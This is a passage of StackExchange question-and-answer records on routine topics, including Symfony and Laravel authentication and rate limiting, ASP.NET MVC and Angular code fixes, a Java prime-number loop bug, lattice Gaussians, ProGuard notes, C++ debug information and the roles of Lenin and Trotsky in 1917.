$this->apiKeyManager->getUsernameForToken($apiKey);\n }\n\n \/**\n * {@inheritdoc}\n *\/\n public function loadUserByUsername($username)\n {\n return $this->userManager->findUserByUsername($username);\n }\n\n \/**\n * {@inheritdoc}\n *\/\n public function refreshUser(UserInterface $user)\n {\n throw new UnsupportedUserException();\n }\n\n \/**\n * {@inheritdoc}\n *\/\n public function supportsClass($class)\n {\n return 'FOS\\UserBundle\\Model\\User' === $class;\n }\n}\n<\/code>\nAnd voila! Both Private and OAuth token are correctly managed.\nComment: merci for sharing your solution. Can you please share also with the complete declaration of the the services `security.authentication.authenticator.api_key` and the one related to the user provider. Merci beaucoup\nComment: One more question: how did inject `ApiKeyManager`?? I search in the service container and I did not find it! Have you created it by yourself?\n","meta":{"source":"stackoverflow","title":"Combining fos_oauth authenticator with single key authenticator","dup_signals":{}},"subset":"stackexchange"} +{"text":"Passing ID from one view to another and storing it in another table\n\nQuestion: I have a create page for adding a festival and a page for a user to create an event for that festival. I am trying to pass the festivals id from and store it in my events table. It gets caught on the post back of the create page. 
Here is the code:\nController:\n<code>[HttpGet]\n public ActionResult Create2(int festID)\n {\n EventsVM events = new EventsVM { festivalID = festID };\n\n events.eType = db.EType.ToDictionary(p => p.ID, q => q.EType);\n events.eType.Add(-1, \"----- Add New Event Type -----\");\n\n events.eventsDate = DateTime.Now;\n events.startTime = DateTime.Now;\n events.endTime = DateTime.Now;\n\n return View(events);\n }\n\n [HttpPost]\n [ValidateAntiForgeryToken]\n public ActionResult Create2(EventsVM model)\n {\n if (ModelState.IsValid != true)\n {\n if (model.selectedEType != -1)\n {\n \/\/db.save stuff from create.\n Events Newevent = new Events();\n Newevent.EndTime = model.endTime;\n Newevent.StartTime = model.startTime;\n Newevent.EventsDate = model.eventsDate = DateTime.Now;\n Newevent.EventsName = model.EventsName;\n Newevent.EType = db.EType.Where(p => p.ID == model.selectedEType).Single();\n Newevent.Location = model.Location;\n \/\/Caught here!!!\n Newevent.FestivalID = model.festivalID;\n\n db.Events.Add(Newevent);\n db.SaveChanges();\n return RedirectToAction(\"Details\", \"Festival\", new { id = model.festivalID });\n \/\/return RedirectToAction(\"Index\", \"Festival\");\n \/\/return RedirectToAction(\"Index\", \"Events\");\n \/\/String test = \"test3\";\n }\n ModelState.AddModelError(\"\", \"No Event Type Picked\");\n }\n\n model.eType = db.EType.ToDictionary(p => p.ID, q => q.EType);\n model.eType.Add(-1, \"----- Add New Event Type -----\");\n model.eventsDate = DateTime.Now;\n model.startTime = DateTime.Now;\n model.endTime = DateTime.Now;\n\n return View(model);\n }\n<\/code>\nI have to \"saved\" Festival ID on the details page of the selected festival id\nDetails.cshtml - Festival\n<code> <div>\n<h3>Details for Festival: @Model.FestivalName.ToString()<\/h3>\n<\/div>\n<hr \/>\n<div class=\"table-responsive\">\n<!--<div class=\"table\">-->\n <table class=\"table\">\n <tr>\n <th>\n Festival Name\n <\/th>\n <th>\n Start Date\n <\/th>\n <th>\n End Date\n <\/th>\n <th>\n Town\n <\/th>\n <th>\n County\n <\/th>\n <th>\n Festival Type\n <\/th>\n <th>\n Options\n <\/th>\n <\/tr>\n <tr>\n <td>\n @Html.DisplayFor(model => model.FestivalName)\n <\/td>\n <td>\n @Html.DisplayFor(model => model.StartDate)\n <\/td>\n <td>\n @Html.DisplayFor(model => model.EndDate)\n <\/td>\n <td>\n @Html.DisplayFor(model => model.FestivalTown.Name)\n <\/td>\n <td>\n @Html.DisplayFor(model => model.FestivalCounty.Name)\n <\/td>\n <td>\n @Html.DisplayFor(model => model.FType.FType)\n <\/td>\n <td>\n <div class=\"btn-group\">\n @* <button class=\"btn btn-info btn-sm dropdown-toggle\" type=\"button\" data-toggle=\"dropdown\">Options<\/button>*@\n <button type=\"button\" class=\"btn btn-info btn-sm dropdown-toggle\" data-toggle=\"dropdown\">\n <span class=\"caret\"><\/span>\n <\/button>\n <ul class=\"dropdown-menu\">\n <li role=\"presentation\" class=\"dropdown-header\">Festival<\/li>\n <li>@Html.ActionLink(\"Edit\", \"Edit2\", new { id = Model.FestivalId })<\/li>\n <li>@Html.ActionLink(\"Back to List\", \"Index\")<\/li>\n <\/ul>\n <\/div>\n <\/td>\n <\/tr>\n <\/table>\n<\/div>\n@if (Model.Events != null)\n{\n <center><div class=\"well well-sm\" style=\"width:400px\">@Model.FestivalName.ToString() has @Model.Events.Count() Events<\/div><\/center>\n @Html.ActionLink(\"Add Event\", \"Create2\", \"Events\", new { festID = Model.FestivalId }, new { @class = \"btn btn-primary\"})\n <br \/>\n <br \/>\n <!--<div class=\"table-responsive\">-->\n <div class=\"table\">\n <table class=\"table table-striped\">\n <tr>\n <th>Events 
Name\n <\/th>\n <th>Events Date\n <\/th>\n <th>Start Time\n <\/th>\n <th>End Time\n <\/th>\n <th>Options\n <\/th>\n <\/tr>\n\n @foreach (var e in Model.Events)\n {\n <tr>\n <td>\n @Html.DisplayFor(modelItem => e.EventsName)\n <\/td>\n <td>\n @Html.DisplayFor(modelItem => e.EventsDate)\n <\/td>\n <td>\n @Html.DisplayFor(modelItem => e.StartTime)\n <\/td>\n <td>\n @Html.DisplayFor(modelItem => e.EndTime)\n <\/td>\n <td>\n <div class=\"btn-group\">\n <button type=\"button\" class=\"btn btn-success btn-sm dropdown-toggle\" data-toggle=\"dropdown\">\n <span class=\"caret\"><\/span>\n <\/button>\n <ul class=\"dropdown-menu\">\n <li role=\"presentation\" class=\"dropdown-header\">Event<\/li>\n <li role=\"presentation\" class=\"divider\"><\/li>\n <li>@Html.ActionLink(\"Edit\", \"Edit2\", \"Events\", new { id = e.ID }, null)<\/li>\n <li>@Html.ActionLink(\"Details\", \"Details\", \"Events\", new { id = e.ID }, null)<\/li>\n <li>@Html.ActionLink(\"Delete\", \"Delete\", \"Events\", new { id = e.ID }, null)<\/li>\n <\/ul>\n <\/div>\n <\/td>\n <\/tr>\n }\n\n <\/table>\n <\/div> \n}\n<\/code>\nThe error I get is when it posts back, the id in the link becomes a 0, so its not saving the id. Any id on how I can fix this?\nComment: Where? I already have it in the link of the post back in the create page?\n return RedirectToAction(\"Details\", \"Festival\", new { id = model.festivalID });\nComment: This is the error I get also : The parameters dictionary contains a null entry for parameter 'festID' of non-nullable type 'System.Int32' for method 'System.Web.Mvc.ActionResult Create2(Int32)' in 'MyFestival.Controllers.EventsController'. An optional parameter must be a reference type, a nullable type, or be declared as an optional parameter.\nComment: that error is because you are passing a null value to the method action, if the value you are pasing is going to be null sometimes you can change your method parameter to Create(int? 
id) or Create(int id = 0) for optional parameter.\nAnswer: Here is the answer @Overmachine\n<code> [HttpGet]\n public ActionResult Create2(int festID)\n {\n EventsVM events = new EventsVM { festivalID = festID };\n\n events.eType = db.EType.ToDictionary(p => p.ID, q => q.EType);\n events.eType.Add(-1, \"----- Add New Event Type -----\");\n\n events.eventsDate = DateTime.Now;\n events.startTime = DateTime.Now;\n events.endTime = DateTime.Now;\n\n return View(events);\n }\n\n [HttpPost]\n [ValidateAntiForgeryToken]\n public ActionResult Create2(EventsVM model, int festID)\n {\n if (ModelState.IsValid != true)\n {\n if (model.selectedEType != -1)\n {\n \/\/db.save stuff from create.\n Events Newevent = new Events();\n Newevent.EndTime = model.endTime;\n Newevent.StartTime = model.startTime;\n Newevent.EventsDate = model.eventsDate = DateTime.Now;\n Newevent.EventsName = model.EventsName;\n Newevent.EType = db.EType.Where(p => p.ID == model.selectedEType).Single();\n Newevent.Location = model.Location;\n \/\/Caught here!!!\n Newevent.FestivalID = model.festivalID = festID;\n\n db.Events.Add(Newevent);\n db.SaveChanges();\n \/\/Change the model.festivalID to Newevent.FestivalID\n return RedirectToAction(\"Details\", \"Festival\", new { id = Newevent.FestivalID });\n \/\/return RedirectToAction(\"Index\", \"Festival\");\n \/\/return RedirectToAction(\"Index\", \"Events\");\n \/\/String test = \"test3\";\n }\n ModelState.AddModelError(\"\", \"No Event Type Picked\");\n }\n\n model.eType = db.EType.ToDictionary(p => p.ID, q => q.EType);\n model.eType.Add(-1, \"----- Add New Event Type -----\");\n model.eventsDate = DateTime.Now;\n model.startTime = DateTime.Now;\n model.endTime = DateTime.Now;\n\n return View(model);\n }\n<\/code>\nComment: what did you change? you just copy my answer\nComment: I added this:\n\n Newevent.FestivalID = model.festivalID = festID;\nComment: @Overmachine I did add your code at first, but I got a 404, so I just add a bit of code to see would it work and it did, but thanks for helping me.\nAnswer: The id is 0 because you are passing the model.ID not the entity id which EF generate after the SaveChanges (propagating changes into database) and add to the ObjectSet. So, the Id will be automatically filled for you. 
change your code to this.\n<code>[HttpPost]\n[ValidateAntiForgeryToken]\npublic ActionResult Create2(EventsVM model)\n{\n if (ModelState.IsValid != true)\n {\n if (model.selectedEType != -1)\n {\n \/\/db.save stuff from create.\n Events Newevent = new Events();\n Newevent.EndTime = model.endTime;\n Newevent.StartTime = model.startTime;\n Newevent.EventsDate = model.eventsDate = DateTime.Now;\n Newevent.EventsName = model.EventsName;\n Newevent.EType = db.EType.Where(p => p.ID == model.selectedEType).Single();\n Newevent.Location = model.Location;\n \/\/Caught here!!!\n Newevent.FestivalID = model.festivalID;\n\n db.Events.Add(Newevent);\n db.SaveChanges();\n \/\/Change the model.festivalID to Newevent.FestivalID\n return RedirectToAction(\"Details\", \"Festival\", new { id = Newevent.FestivalID });\n \/\/return RedirectToAction(\"Index\", \"Festival\");\n \/\/return RedirectToAction(\"Index\", \"Events\");\n \/\/String test = \"test3\";\n }\n ModelState.AddModelError(\"\", \"No Event Type Picked\");\n }\n\n model.eType = db.EType.ToDictionary(p => p.ID, q => q.EType);\n model.eType.Add(-1, \"----- Add New Event Type -----\");\n model.eventsDate = DateTime.Now;\n model.startTime = DateTime.Now;\n model.endTime = DateTime.Now;\n\n return View(model);\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"Passing ID from one view to another and storing it in another table","dup_signals":{}},"subset":"stackexchange"} +{"text":"Set Throttle property with name property in single route\n\nQuestion: I am presently using below code in route in Laravel 8.\n<code>use App\\Http\\Controllers\\Annonymous\\Login\\API\\LoginAPIController;\nRoute::post('\/authenticate', [LoginAPIController::class, \"authenticateUser\"])->name(\"apiAuthenticateUser\");\n<\/code>\nLike there is name property, Is there any way to set middleware also for throttle along with name property? Something like this?\n<code>use App\\Http\\Controllers\\Annonymous\\Login\\API\\LoginAPIController;\nRoute::post('\/authenticate', [LoginAPIController::class, \"authenticateUser\"])->name(\"apiAuthenticateUser\")->throttle(\"10, 1\");\n<\/code>\nAnswer: Yes, throttle is a middleware so you would do the following\n<code>Route::post('\/authenticate', [LoginAPIController::class, \"authenticateUser\"])->name(\"apiAuthenticateUser\")->middleware('throttle:10, 1');\n<\/code>\n","meta":{"source":"stackoverflow","title":"Set Throttle property with name property in single route","dup_signals":{}},"subset":"stackexchange"} +{"text":"What were Lenin's and Trotsky's roles in the October revolution of 1917?\n\nQuestion: Lenin spend the two months preceding the overthrow of the provisional government far away from Saint-Petersburg\/Petrograd or Moscow - even the official Soviet version of events openly and readily admitted that he arrived to the revolutionary headquarters at Smolny Institute in the last moments before the government overthrow.\nIn the same time, Trotsky apparently orchestrated the revolution1 (of which the attack on the Winter palace was only the last act) - by assuring control of the media and the communications,s getting the support of the military and workers, and planning the action in details. As the chairman of the Petrograd Soviet Trotsky also held the political power. 
(This part was obviously hushed up in the Soviet discourse, but is routinely referred to in western descriptions.)\nNaively, it seems that Trotsky was the man calling the shots - therefore it is not obvious why he would allow Lenin to play any important role at all (honesty, chivalry and party discipline are all good, but power is power.) Or perhaps he didn't even intend to let Lenin in - as Trotsky was made to control both the foreign affairs and the army in the new government, which might suggest that Lenin was just a figurehead (this is not unlike the preceding government, where Kerensky was the real strongman, while not being the prime minister.)\nIs my assessment of their relative power\/influence supported by the evidence? What else accounts for the outcome?\n\n1 E.g., here is the recap of the situation from Marxism after Marx by David McLellan (emphasis mine):\n\nBy mid-September Lenin - still in Finland - wrote to the Central Committee: \"The Bolsheviks, having obtained a majority in the Soviets of workers and soldier deputies of both capitals, can and must take State power into their own hands.\" Most of the Party leaders still in Russia, mindful of the July defeat, were loath to take Lenin's suggestion seriously and he went as far as threatening to resign from the Central Committee and appeal to the ordinary members in order to stir them to the decisive action, which he only finally managed to implement by coming to St Petersburg in person in Mid-October. Even so, such influential members as Zinoviev and Kamenev (and they were not alone) continued to oppose insurrection and even publicized the split (and thus Lenin's intentions) in print. But the plans for insurrection meticulously prepared and supervised by Trotsky, had their own momentum and when the Provisional Government attempted to close certain Bolshevik papers on 24 October the Bolshevik seizure of power began, a seizure which, at least in its initial stages, must be one of the easiest and least bloody in history.\nComment: @MCW As is, a possible answer is that my assessment of the relative influence of Lenin and Trotsky is incorrect. Perhaps the title should be more towards asking how big the influence of each of them was, or whether there was any struggle for power between them. I am not sure how this could be expressed in a short sentence - if you have suggestions, I am ready to consider them.\nAnswer: Short Answer\nLenin and Trotsky were entirely involved in the events of October 1917, particularly if those events were classified as a coup and not a revolution. Trotsky was a leading \"organizer on the ground,\" while Lenin was the undisputed leader and essence of the Bolshevik Party.\nLong Answer\nTo understand how Russian revolutionaries related to major unrest in Imperial Russia, it's worth noting how things had unfolded in prior events.\nRussian revolutionaries tended to be out of touch with initial uprisings. The typical peasant revolts of old times generally had no political aims, and the unrest of the universities and even the lead-up of the revolution of 1905 were pedantic in nature: society began to snap at certain hot-button yet confined issues, for example, food strikes or university students wanting to get the police to loosen up on them.\nThe revolutionaries pulled a lot of theory from German idealists, which arguably did not help them much. German idealism and philosophy, such as that of Marx and others, of the late 1800s was esoteric and convoluted. 
The main effect was that as their theories ran like a rabbit through the woods, any listener would eventually hear what they wanted to hear to confirm their own beliefs. To the Russian revolutionaries, they took away some bits of theory of political revolution that would never occur in Russia. Their efforts to stoke a peasant uprising on these theories in the 1870s fell flat on its face because of this disconnect. When an uprising would occur, such as the 1899 university strikes, the revolutionaries would at first sit on the benches and play down the event because it was not in accordance with their German-derived doctrine. When the uprising showed signs of serious traction, they would then leap into action, try to wrest control of it (usually by setting up a leadership committee in the epicenter) and try to attach grand political aims to the movement. Usually these grand political aims, like overthrowing the monarchy, would alienate the masses involved and leave the revolutionaries stuck between a rock: the slow and ham-fisted government, and a hard place: an obstinate populace.\nThus the revolutionaries, including Lenin's Bolshevik Party - a party that he built and cast his entire life into - \"missed\" the Revolution of February 1917. In that case, the stresses of the war combined with a government that was completely out of touch with realities on the street came to a head due to weather: the winter had been unusually cold and food supplies dwindled, but a warm snap in February allowed everyone to turn out and vent their frustrations. Food strikes rapidly flared up and led to a serious rebellion among the troops (the troops being recent drafts who cared more about their grievances from their peasant days than being soldiers in the present). The Tsar's government was paralyzed against the mass rebellion and resigned.\nNote that in February, Lenin was in Zurich. His diary of that winter showed frenetic yet unfocused efforts: pamphlet publishing, intriguing against the Swiss SD's, and studying Marx and Engels. He did not know of the seriousness of the revolution until the Duma had assumed power. He frantically plotted to return to Russia, and in the mean time sent cables to his associates in Russia with orders: Lenin was fearful that his colleagues would negotiate or find an agreement with the new government.\nFollowing the abdication of the Tsar and during the days of the Provisional Government, a power vacuum formed that Lenin was desperate to seize. His initial strategy, from April to July, was to take to the streets with armed force and emulate in deed (but not in spirit) the events of February. This effort did not succeed and the Bolshevik Party almost collapsed in July. Going back to the drawing board, a more insidious plan was developed from August that put on a facade of hosting the Congress of Soviets (the bait), while focusing on a plan to have the party's armed wing seize certain centers of power by force (the coup). The facade of seeking to transfer power to the soviets was more of Trotsky's project.\n\nTrotsky was an ideal complement to Lenin. Brighter and more\nflamboyant, a much better speaker and writer, he could galvanize\ncrowds: Lenin's charisma was limited to his followers. But Trotsky\nwas unpopular with the Bolshevik cadres, in part [...] because he was\nunbearably arrogant. [..] 
During the Revolution and Civil War he was\nLenin's alter ego, an indispensable companion in arms: after victory\nhad been won, he became an embarrassment.\n\nPipes, The Russian Revolution, pg 439.\n\nTrotsky's skill as a public whip began to place the Provisional Government - seriously weakened after the Kornilov Affair - on the horns of a dilemma with the upcoming Congress of Soviets. The strategy was expressed by Trotsky:\n\nIn essence, our strategy was offensive. We prepared to assault the\ngovernment, but our agitation rested on the claim that the\n[government] was getting ready to disperse the Congress of Soviets and\nit was necessary mercilessly to repulse him.\n\nPipes, The Russian Revolution, pg 485.\n\nThe coup itself was exemplified by events of the night of October 24:\n\nThat night [], the Bolsheviks systematically took over all the\nobjectives of strategic importance by the simple device of posting\npickets: it was a model modern coup d'etat as described by Malaparte.\nIunker guards were told to go home: they either withdrew voluntarily or\nwere disarmed. Thus, under cover of darkness, one by one, railroad\nstations, post offices, telephone centers, banks, and bridges fell\nunder Bolshevik control. No resistance was encountered, no shots\nfired.\n\nPipes, The Russian Revolution, pg 491.\n\nFor Lenin's part, he is given credit because the Bolshevik Party was his and he was the Party. His life was so entwined with it that little material exists of who Lenin the Person was. However, he was not directly front and center during the coup: the disaster of July caused him to go into hiding and to make no public appearances until late October. While in \"seclusion\" he issued orders from afar but was also lagging in responding to events while being alone and designing the world to his liking - a typical position for Lenin throughout his life. However, his enormous force of will drove the party forward, as Lenin was almost alone in the Central Committee for his extreme stance and goal - yet it was achieved. During October 24-25, Lenin spent the time in disguise and making furtive movements. Shortly after, he was almost forced to take the chair of the new proto-government Sovnarkom.\nIn conclusion, Trotsky was responsible for \"public agitation\" and for running the \"legitimate face\" of the coup: pitting the Congress of Soviets against the government. Lenin lashed the party - often from a distance - for extreme goals and put out strategy that was often hit-and-miss with real events.\nCoups are by definition events that can be placed at the feet of certain names and faces, and in this case Trotsky and Lenin were responsible.\nThis answer is a digest that is sourced from:\nPipes, Richard. The Russian Revolution. Vintage Books, 1990.\nPipes, Richard. Russia under the Old Regime. Penguin Books, 1995.\nAnswer: I can't offer a succinct answer, but Mike Duncan develops the answer in depth in the Revolutions Podcast; Lenin's intellectual and strategic leadership was undeniable. Without Lenin there would have been no revolution.\nLenin strategically manipulated all forces to the cusp of a revolution. Everyone else was seeking some form of harmonious outcome along the lines of a pareto optimal parliament. Lenin advocated for revolution in public and in private manipulated to ensure that revolution would occur.\nComment: Not directly related - I think that with the advantage of the hindsight we can say that the revolution was an error. 
Even from the Marxist point of view - Russia could have benefitted from developing democratic\/liberal\/capitalist society along western lines. The lack of mature proletariat resulted in the party dictatorship with the well-known consequences. One could even say that, thanks to the October revolution, Russia returned to the autocratic rule, which had been supposed to end in February.\n","meta":{"source":"history.stackexchange","title":"What were Lenin's and Trotsky's roles in the October revolution of 1917?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Trying to find out prime numbers using for loop but my code is not working, why?\n\nQuestion: <code>import java.util.Scanner;\n\npublic class forLoopPrimeNumberSearch {\n\n public static void main(String[] args) {\n Scanner input = new Scanner(System.in);\n System.out.print(\"Enter begining value: \");\n int beginingValue = input.nextInt();\n System.out.print(\"Enter ending value: \");\n int endingValue = input.nextInt();\n\n System.out.println(\"Prime number between \" + beginingValue+ \" to \"+ endingValue);\n int counter = 0;\n for(int i = beginingValue; i<= endingValue; i++){\n if(i <=1){\n continue;\n }\n boolean ifPrime = true;\n for( int k = 2; k <= i ; k++){\n \/\/if i write the above line like this than i get the expected result for( int k = \n if(i % k == 0){\n ifPrime = false;\n break;\n }\n }\n if(ifPrime){\n System.out.print(i + \" \");\n counter++;\n }\n }\n System.out.println(\" \");\n System.out.println(\"Number count: \" +counter);\n\n }\n<\/code>\nMaybe there are many different ways to solve this problem but as a beginner, I try to implement what I have learned so far.\nAnswer: Here:\n<code>for( int k = 2; k <= i ; k++) \n<\/code>\nBecause of this condition: <code>k <= i<\/code> You're checking <code>k<\/code> as a factor of <code>i<\/code> when <code>k<\/code> is equal to <code>i<\/code>. So you'll always find a factor, even if <code>i<\/code> is prime.\nChange the condition to <code>k < i<\/code>. Or if you want your code to be a little more efficient, stop when <code>k<\/code> is greater than the square root of <code>i<\/code>.\nAnswer: The problem here is, your loop condition is <code>k <= i<\/code>. This will make it so that when you get to the last iteration of the loop, you check \"is i divisible by i?\", which of course will yield a result of a composite number. What you want to do is check all of the numbers less than i, or to be more precise less than the square root of k, to really check the primality of the number. 
Your loop will then become like so.\n<code>boolean ifPrime = true;\nfor(int k = 2; k <= Math.sqrt(i); k++) {\n if(i % k == 0) {\n ifPrime = false;\n break;\n }\n}\n<\/code>\nAlso, for this type of algorithm where you have to find all of the prime numbers in a certain range, something like the Sieve of Eratosthenes algorithm will work much better and will be faster.\n","meta":{"source":"stackoverflow","title":"Trying to find out prime numbers using for loop but my code is not working, why?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Gaussian function in lattices\n\nQuestion: Probability density function of gaussian distribution is \n$$ 1\/{\\sqrt{2 \\pi} \\sigma} \\times {e^{{(x-c)^2\/ 2{\\sigma}^2 }}} $$\nin lattices we assume $$ \\sigma =s\/\\sqrt{2 \\pi} $$so the gaussian function becomes\nFor $$X \\in R^n$$ $$\\rho_s(X)=1\/s^n \\times e^{-{\\pi}||(x-c||)^2\/s^2}$$ but it is given as\n$$\\rho_s(X)= e^{-{\\pi}||(x-c||)^2\/s^2}$$ can you explain why is this difference?\nComment: This isn't my area, but if I had to guess it's because the $\\frac{1}{s^n}$ is a scaling factor that doesn't affect sampling from the distribution?\nComment: Is it really 1 over $s^n$ or it should be $s^2$ ?\nAnswer: The Gaussian function over a lattice, if you define it with or without the scaling factor $1\/s^n$, is not a probability distribution, since it does not sum to 1. In order to construct a probability distribution, that samples points proportionally to the Gaussian function, one has to rescale anyway by dividing by the sum of the Gaussian over all lattice points (even though this is an infinite sum, it is well defined and one can compute sharp bounds on it). So any scaling factor you apply to the Gaussian function will be cancelled out by this normalization anyway, so you might as well define the Gaussian without it.\nAnswer: $\\rho_s(X)$ for a lattice with dimension $n$ is $(1\/s)^ne^{-\\pi||X||^2\/s^2}$\nAs we know it is Spherically Symmetric. So The probability of $X$ only depends on its length. We can consider $s=1$ in this case.\n","meta":{"source":"crypto.stackexchange","title":"Gaussian function in lattices","dup_signals":{}},"subset":"stackexchange"} +{"text":"Calculate difference in 2 values - Angular\n\nQuestion: I have a table that has 3 values (old, new & difference) I'm wondering how to calculate the difference in the 2 values to set the 'differenceInValues' variable. Thanks in advance!\n<code><td scope=\"row\">\n {{change.oldValue}}\n<\/td>\n<td scope=\"row\">\n {{change.newValue}}\n<\/td>\n<td scope=\"row\">\n {{change.differenceInValues}}\n<\/td>\n<\/code>\nComment: Can you give more information - what is in `oldValue` and `newValue`? The difference can be calculated for numbers quite simply (by subtracting them)\nAnswer: May be this example will help you:\nHTML\n<code><div>\n {{value1}}\n<\/div>\n<div>\n {{value2}}\n<\/div>\n<div>\n {{getDiff()}}\n<\/div>\n<\/code>\nTS\n<code>@Component({\n selector: 'app-root',\n templateUrl: '.\/app.component.html',\n styleUrls: ['.\/app.component.scss']\n})\nexport class AppComponent {\n\n value1: number = 5;\n value2: number = 3;\n\n getDiff(): number {\n return this.value1 - this.value2;\n }\n}\n<\/code>\nComment: @jo-chris ok, you can use {{value1 - value2}} :)\nComment: I would not recommend using methods in templates, even if its as simple as here. 
Store the result in a variable and then use String Interpolation to display it.\n","meta":{"source":"stackoverflow","title":"Calculate difference in 2 values - Angular","dup_signals":{}},"subset":"stackexchange"} +{"text":"Offline functionality in asp.net mvc with local storage\n\nQuestion: I want to add offline functionality in my existing asp.net mvc 4.7 web application. I searched a lot and found many links to add offline functionality in html pages but could not find any link for asp.net mvc. please provide me link of any sample work done related to this.\nAnswer: The modern web ecosystem is made up of many different types of scenarios of how users interact with online content.We imagined leveraging the browser to bring fully competent web applications to the desktop, but failed due to the lack of decent browser support. Although there were some caching techniques available before, they were never really designed with the intention of making web applications run completely offlin.\nSo if you want to make a offline suported web appilcain you should know --\n\nHow to manage, refesh, save manifest files both Server & client side\nHow to manage caching both Server & client side\nHow to swapping cache\nHow to Handling events\nHow to Detect whether the browser is online or offline and let user know.\n\nyou can find more information in below articles --\n\nBuild an HTML5 Offline Application with Application Cache, Web Storage and ASP.NET MVC\nHTML5 offline web applications using ASP.NET MVC\nComment: It might be helpful for my current project\n","meta":{"source":"stackoverflow","title":"Offline functionality in asp.net mvc with local storage","dup_signals":{}},"subset":"stackexchange"} +{"text":"Note: android.support.v4.text.ICUCompatIcs: can't find dynamically referenced class libcore.icu.ICU\n\nQuestion: I started getting the message with the latest Android Build Tools (ABT) v19.0.3 today. At first glance, I thought this might be an issue with ABT. However, a closer investigation reveals that this message:\n<code>android.support.v4.text.ICUCompatIcs: can't find dynamically referenced class libcore.icu.ICU\n<\/code>\nis only shown when Proguard is used. Answers on the net has yeilded no solution for me. Perhaps, this is only an issue with Proguard (the version I'm using is bundled with Android SDK v22.3).\nI have added the following directives to <code>proguard-project.txt<\/code> file, but it makes no difference:\n<code>-keep interface android.support.v4.** { *; }\n-keep class android.support.v4.** { *; }\n<\/code>\nDoes anyone else come across this message and has a possible solution? Maybe Eric from Proguard might be able to shed some light into this issue. Maybe a code cleanup is required with Proguard? I'm interested to know the solution.\nComment: I faced the same issue today when set up proguard for my project. As this is just a Note I ignored it and my proguarded code runs well.\nComment: Have you tried using something like `-libraryjars $ANDROID_HOME\/extras\/android\/support\/v7\/appcompat\/libs\/android-support-v4.jar` ?\nComment: @deko: Yes, I can use the `dontwarn` directive to ignore the comment. However, should Proguard even display this comment? @Shonzilla: Adding `keep class android.support.v7.appcompat** { *; }` or doing what you suggested above also do not remove the comment. That's why I'm stumped.\nAnswer: The note says that a support class is using reflection to access a runtime class that isn't present in the target runtime. 
In general, it could be a sign of compatibility problems. In this case, it's harmless; the developers of the support library are precisely using reflection to avoid any linking problems with different runtime environments. You can suppress the note with:\n<code>-dontnote android.support.**\n<\/code>\nComment: Thanks, Eric. I'll add your suggestion above to my project.\n","meta":{"source":"stackoverflow","title":"Note: android.support.v4.text.ICUCompatIcs: can't find dynamically referenced class libcore.icu.ICU","dup_signals":{}},"subset":"stackexchange"} +{"text":"Do compiled C++ binaries store the original source code?\n\nQuestion: When I run some C++ code, and I receive an error, it manages to print out the exact line in a particular source file on which that error occurred. This is obviously great for debugging, but I believe that the program I am running was built in release mode. So my questions is, do all programs built in release mode store the original source c++ code, with references to it in the compiled binary? This seems like an inefficient way to create a binary if it is only to be distributed to consumers, rather than to developers.\nComment: The simple answer is: No. However, when you build debug versions the compiler usually stores some information about the source, including line-number information and where the actual source files can be found. *How* the compiler stores that differs between compilers and platforms.\nComment: If you are talking about asserts, or similar methods, they don't store all your source-code, they only store the expression they're asserting (not that you should necessarily enable assertions in release).\nComment: This is highly tool dependent. Describe your tool chain.\nComment: @PeterT It really depends on the implementation: a lot do, but it isn't required. (And in most cases, you _should_ leave assertions active in your released code.)\nAnswer: I never saw a \"mainstream\" C++ compiler store the original source. When you see some references to the source, typically it boils down to one of those tricks:\n\nreferences to source file\/line: these are created via macros. 
Most logging libraries provide some macro that includes in its bowels the <code>__FILE__<\/code> and <code>__LINE__<\/code> macros, which, at compile time, expands to the current file and line; macros like <code>__FUNCTION__<\/code> are a common extension;\n\nexpressions in failed asserts: the <code>assert<\/code> macro (and similar beasts) often not only uses <code>__FILE__<\/code> and <code>__LINE__<\/code>, but stringifies (again, at compile time) the given expression, to show it when the <code>assert<\/code> fails;\n\nnames of classes in the executable: if you enable RTTI, the compiler has to store somewhere the names of the types, to allow the use of the <code>typeid<\/code> operator;\n\nstuff you see in the debugger\/in stack traces: this comes from the debugging information, which allows a reverse mapping from the instruction pointer to the location in the sources and the function name; this of course requires having the debug information (which may or may not be generated in release builds, or may be put in a separate file) and the actual sources (if you want to look up what the code actually is).\nSince this is both quite big (in a project I work on it is 12x the size of the stripped executable) and can help in reverse engineering, it is rarely shipped to the customer (but is kept in-house, to be able to analyze the \"raw\" stack traces generated by the released application).\nAnswer: No. Neither in debug nor in release mode are the actual sources stored.\nThe tool chain may store enough information for debugger to map\naddresses in the machine code to lines in the sources, but the sources\nmust be available if the debugger is to display anything. This has\nnothing to do with \"Debug\" or \"Release\" mode; at least in our\nconfiguration, we store it in both. (Of course, because the compiler\nmay rearrange bits of code when it optimizes, the information isn't\nalways exploitable in optimized builds.)\nAs for the output of <code>assert<\/code>: C++ has two built in macros, <code>__FILE__<\/code>\nand <code>__LINE__<\/code>, which the compiler will replace with the appropriate\nvalues when it is compiling the code. These are used in the <code>assert<\/code>\nmacro (typically, at least), and usually in various user defined logging\nmacros as well. The macro preprocessor also has an operator to\n\"stringize\" its arguments, which can be used to get the asserted\nexpression into the assert output.\nAnswer: Compilers don't store the original source code. As mentioned, with a debug build, they store line numbers which are used to reference source code. There were some old tool sets (assemblers, compilers) that would leave fragments of source code in what should have been uninitialized memory in a program, just grabbing whatever happened to be in memory during assembly or compile time when creating the uninitialized memory area of a program. 
This mostly occurred with .COM program files since there's no provision for load time allocation of uninitialized memory as there is with a .EXE program.\n","meta":{"source":"stackoverflow","title":"Do compiled C++ binaries store the original source code?","dup_signals":{}},"subset":"stackexchange"} +{"text":".NET Framework 4.7 support?\n\nQuestion: I would like to leverage some new features in .NET 4.7 (like built-in support for Value Tuples).\nHowever, after changing the target framework to 4.7 in my model project, when I update my model I see the following in the output window:\n<code>The DevForce EDM Extension cannot be used with model BearPawModelMain.edmx. If you wish to use DevForce change the target framework for this project to 4.5+\n<\/code>\nIs 4.7 supported? The message is misleading...\nComment: check that all your project as targeting 4.7 also i believe this only available with win 10 latest... or something like that.\nAnswer: DevForce doesn't currently support .NET 4.7 in model projects (containing either an EDMX or Code First model). We'll be adding this support later this summer. \nComment: Ok thanks. I discovered I can add value tuple support via nugget so I will do that for now.\nComment: I see that there is a 7.5.2-rc build available. Do you have any estimate on when that will be officially released? We are at the early stages of moving to 4.7 so are curious about this.\nComment: We'll probably release 7.5.2 the first week in July.\n","meta":{"source":"stackoverflow","title":".NET Framework 4.7 